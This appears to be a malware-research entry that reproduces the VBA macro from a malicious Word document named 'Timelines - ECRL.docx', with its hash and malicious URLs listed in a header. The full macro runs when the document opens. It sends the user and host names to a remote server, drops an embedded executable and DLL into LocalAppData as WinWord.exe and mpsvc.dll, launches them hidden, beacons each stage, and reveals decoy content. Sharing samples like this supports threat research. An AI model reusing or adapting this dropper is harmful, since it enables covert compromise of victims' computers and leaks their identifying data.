[Macro] Timelines - ECRL.docx

1. # Malicious Macro from - https://twitter.com/ClearskySec/status/1110941178231484417
2. # Filehash: 67dafac37ca130af3f818ab927ad5bcc
3. # Size: 18623
4. # Filename: Timelines - ECRL.docx
5. # Malurls
6. # - http://167.99.72.82/main.dotm - Malicious DOCM
7. # - http://195.12.50.168/D2_de2o@sp0/ - C2
8.  
9. Rem Attribute VBA_ModuleType=VBADocumentModule
10. Option VBASupport 1
11. Option Explicit
12. #If VBA7 Then
13.     Private Declare PtrSafe Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
14.     Private Declare PtrSafe Function EmptyClipboard Lib "user32" () As Long
15.     Private Declare PtrSafe Function CloseClipboard Lib "user32" () As Long
16. #Else
17.     Private Declare Function OpenClipboard Lib "user32" (ByVal hwnd As Long) As Long
18.     Private Declare Function EmptyClipboard Lib "user32" () As Long
19.     Private Declare Function CloseClipboard Lib "user32" () As Long
20. #End If
21.  
22. Private Sub Document_Open()
23.     On Error Resume Next
24.     Dim iShape As Shape
25.     Dim EmbeddedEXEFileName As String
26.     Dim EmbeddedDllFileName As String
27.     Dim OutPutEXEName As String
28.     Dim OutPutDllName As String
29.     Dim DLLReleased As Boolean
30.     Dim EXEReleased As Boolean
31.     Dim sHostName As String
32.     Dim sUserName As String
33.     Dim myurl As String
34.     Dim MyRequest As Object
35.     Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
36.     sHostName = Environ$("computername")
37.     sUserName = Environ$("username")
38.     myurl = "http://1167.99.72.82/index.html?u=" + sUserName + "&h=" + sHostName
39.     MyRequest.Open "GET", _
40.     myurl
41.     MyRequest.Send
42.     EmbeddedEXEFileName = "189acd0ce3b06b9193ce"
43.     EmbeddedDllFileName = "663f2fe952b29a8d14f5"
44.     OutPutEXEName = Environ("localappdata") + "\Microsoft\Windows\WinWord.exe"
45.     OutPutDllName = Environ("localappdata") + "\Microsoft\Windows\mpsvc.dll"
46.     DLLReleased = False
47.     EXEReleased = False
48.     For Each iShape In ActiveDocument.Shapes
49.         If iShape.Name = EmbeddedEXEFileName Then
50.             iShape.Select
51.             Selection.Copy
52.             FileCopy Environ("TMP") & "\" & EmbeddedEXEFileName, OutPutEXEName
53.             EXEReleased = True
54.             myurl = "http://1167.99.72.82/index.html?a=exe"
55.             MyRequest.Open "GET", _
56.             myurl
57.             MyRequest.Send
58.         ElseIf iShape.Name = EmbeddedDllFileName Then
59.             iShape.Select
60.             Selection.Copy
61.             FileCopy Environ("TMP") & "\" & EmbeddedDllFileName, OutPutDllName
62.             DLLReleased = True
63.             MyRequest.Open "GET", _
64.             myurl
65.             MyRequest.Send
66.         ElseIf iShape.Name = "4862e6f290cff1334b77" Then
67.             'MsgBox "Show Normal Content -> " & iShape.Name
68.            iShape.Visible = msoFalse
69.             ActiveDocument.Content.Font.Hidden = False
70.         End If
71.     Next iShape
72.     If DLLReleased = True And EXEReleased = True Then
73.         Shell OutPutEXEName, vbHide
74.         myurl = "http://1167.99.72.82/index.html?a=run"
75.         MyRequest.Open "GET", _
76.         myurl
77.         MyRequest.Send
78.     End If
79.     OpenClipboard (0&)
80.     EmptyClipboard
81.     CloseClipboard
82. End Sub